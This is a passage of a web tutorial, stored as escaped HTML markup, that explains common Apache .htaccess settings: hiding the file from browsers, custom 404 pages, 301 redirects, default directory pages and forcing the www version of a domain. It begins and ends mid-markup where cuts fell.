normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Upload in ASCII mode, not binary&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 6.0pt; margin-left: 30.0pt; margin-right: 30.0pt; margin-top: 0in; mso-list: l4 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span style=&quot;font-family: Symbol; font-size: 10pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; font-size: 7pt; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;CHMOD the file to 644 (this isn’t absolutely necessary per say but it’s advisable, it means your server can access it but it can’t be seen via a browser).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #faf8f5; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: Arial; font-size: 13pt;&quot;&gt;Also, after editing your .htaccess file serveral times it may look a little complicated so I recommend adding a comment above the longer parts of code so that you know what each section is for when you look at the file again at a later date. To add a comment to the file you simply start the line with #, any code written after the # in the line will not be executed and is simply a reference for you in the future (and anyone else who may be working on your website ie. co-admin or whatever).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #3e4b54; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;Htaccess Supersession&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The most common place to upload an .htaccess file is the root ie. the home page of your website. This is because so many things can be controlled from the top level. However, there are many occasions when you will need to upload an .htaccess file to a sub directory. For example, if you want to password protect a directory you need to place the .htaccess file in the directory you want to protect.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The important thing to remember is that any code in a subdirectory .htaccess file supercedes the one in the directory above. However, it only supercedes it when there is a clash. I’ll explain this with an example.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Lets say your root .htaccess and your subdirectory .htaccess file both state how a&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;404 error&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;should be treated. If someone tries to view a page which has been deleted within the subdirectory then the user will be redirected according to the rule stated in the subdirectory .htaccess file ie. it supercedes the htaccess on the home page. If, however, the user tries to view an incorrect url in the root directory, the root .htaccess file will dictate what will happen.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in; mso-line-height-alt: 15.0pt;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 21.0pt; font-weight: normal;&quot;&gt;How to stop someone looking at your htaccess file&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;One of the first things you want to do is make sure no one tries to look at your .htaccess file. This is actually very easy to do, all you need to do is make use of the&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;Files&lt;/em&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;option.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Just enter the code below to block people seeing your .htaccess file.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 10pt;&quot;&gt;&lt;br /&gt;&lt;code&gt;# Block people seeing the htaccess file&lt;/code&gt;&lt;br /&gt;&lt;code&gt;&amp;lt;Files .htaccess&amp;gt;&lt;/code&gt;&lt;br /&gt;&lt;code&gt;order deny,allow&lt;/code&gt;&lt;br /&gt;&lt;code&gt;deny from all&lt;/code&gt;&lt;br /&gt;&lt;code&gt;&amp;lt;/Files&amp;gt;&lt;/code&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;How to redirect your 404 error to a custom page&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;A 404 error message is the standard HTTP standard response code which is returned when the visitor cannot communicate with the server. This is a very common error on the web and it occurs when you are trying to visit a page which has either been deleted or has been moved somewhere else. For example, if you change the structure of your website and move a certain directory to a different part of your site, anyone trying to visit the old page url will get a 404 error message.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;A 404 error message usually looks something like this :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 11.0pt;&quot;&gt;Not Found&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 11.0pt;&quot;&gt;The requested URL /index.php was not found on this server.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 11.0pt;&quot;&gt;Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.&lt;br /&gt;Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.6 Server at yourwebsite.com Port 80&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;If a visitor comes to your site and sees a standard 404 error message it’s unlikely they will make the effort to see any part of your site. Therefore it is very important to create a 404 page on your site and redirect traffic from incorrect urls.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Thankfully, htaccess makes this very easy. First of all you need to create a 404 error page. So for example, you would create a page at http://www.yoursite.com/404.php which says something like :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 11.0pt;&quot;&gt;It appears you are looking for something which isn’t there. Either you have entered an incorrect URL or we have messed up. Why not visit our home page or alternatively, search for what you are looking for in the search box below.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Whilst a 404 error page does not send the visitor to the exact page they want, it does point them in the right direction and it means they are more likely to stay on your site.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Once you have your 404 page setup, all you need to do is send visitors to incorrect url’s to this page. To do this just add the following line to your .htaccess file :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;ErrorDocument 404 /404.php&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You can place the 404 error template anywhere you want. For example you could place all error messages in a folder called&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;errormessages&lt;/em&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;ErrorDocument 404 /errormessages/404.php&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #3e4b54; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;How to setup a 301 Redirect&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;A 301 HTTP response status code is a way of telling search engines that a page, pages, directory or entire website has been&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;permanently moved&lt;/em&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;to another place on the web. This is very useful if you have changed the structure of your websites url’s or if you have moved domain. You can also redirect your entire site.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Whereas a 301 code tells search engines that something has been&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;permanently moved&lt;/em&gt;, a 302 code tells search engines that something has been&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;temporarily moved&lt;/em&gt;. This is useful if you only want to redirect a page for a short period of time. To do a 302 redirect simply change the 301 part to 302.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You can also use 303, which is means ’seeother’ and the page has been replaced by something else. Again, to do this simply substitute 301 with 303 in the tutorials below.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;How to setup a 301 Redirect&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The basic code for redirecting is :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;Redirect 301 old_location new_location&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;The old location of the file has to be the absolute path from the root of your server. The new location should use http. So for example, if you want to move a file called&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;productreview.html&lt;/em&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;from the root of your site to a subdirectory called&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;em&gt;products&lt;/em&gt;&lt;span class=&quot;apple-converted-space&quot;&gt;&amp;nbsp;&lt;/span&gt;you would use :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;Redirect 301 /productreview.html http://www.yoursite.com/products/productreview.html&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;How to setup a 301 Redirect&lt;/span&gt;&lt;/strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;If you have moved your domain to another site you may want to redirect the whole site. To so this you simply use the following code :&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;Redirect 301 / http://www.newdomainname.com/&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in; mso-line-height-alt: 15.0pt;&quot;&gt;&lt;span style=&quot;color: #3e4b54; font-family: Arial; font-size: 21.0pt; font-weight: normal;&quot;&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in; mso-line-height-alt: 15.0pt;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 21.0pt; font-weight: normal;&quot;&gt;Change the Default Directory Page&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;When you load a directory on the web, for example www.yoursite.com or www.yoursite.com/articles/, the apache server usually looks for the index.html file. If it can’t find that it will look for index.php or index.cgi. Index.html is usually the page with the highest priority and the one which is loaded first.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;It is possible to change the default directory index page. Say, for example, you wanted visitors to go to notice.html instead of index.html. All you have to add to your .htaccess file is&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;DirectoryIndex notice.html&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;This can be extended so that the server looks for other files if it cannot find the first one.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;code&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-size: 10pt;&quot;&gt;DirectoryIndex notice.html index.cgi index.php index.html&lt;/span&gt;&lt;/code&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Priority goes from left to right. So the server would look for notice.html. If that file is not there it will look for index.cgi, then index.php and then index.html.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; line-height: 15.0pt; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;You can do to this within any directory on your site. Simply upload an .htaccess file with the above code. Remember, this will supercede the .htaccess file at the root of your domain.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #3e4b54; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;&lt;o:p&gt;&amp;nbsp;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;Force users to use the WWW or Non-&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;h1 style=&quot;background: #FAF8F5; margin-bottom: 6.0pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;color: #943634; font-family: Arial; font-size: 25.0pt; font-weight: normal;&quot;&gt;WWW version of your domain&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/h1&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;To avoid duplicate content in search engines you can force users to use either the www or the non-www version of your website domain. This avoids search engines such as Google indexing two versions of your domain, something which is quite common because people link to both www and on-www versions of a domain (known as the www/non-www canonical issue).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;It really doesn’t matter if you use www.yoursite.com or yoursite.com. I personally use www on most sites I own however many people prefer to drop it, it’s really up to you.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;strong&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;Force users to use http://www.yoursite.com&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: 7.5pt; margin-left: 0in; margin-right: 0in; margin-top: 0in;&quot;&gt;&lt;span style=&quot;font-family: Arial; font-size: 13pt;&quot;&gt;To force users to use the www version of your domain all you have to do is add the following code to your .htaccess file (just replace yoursite.com with your domain name).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;background: #FAF8F5; margin-bottom: .0001pt; margin: 0in;&quot;&gt;&lt;span style=&quot;background-attachment: initial; background-clip: initial; background-color: #f9b954; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; font-family: &#39;Courier New&#39;; font-size: 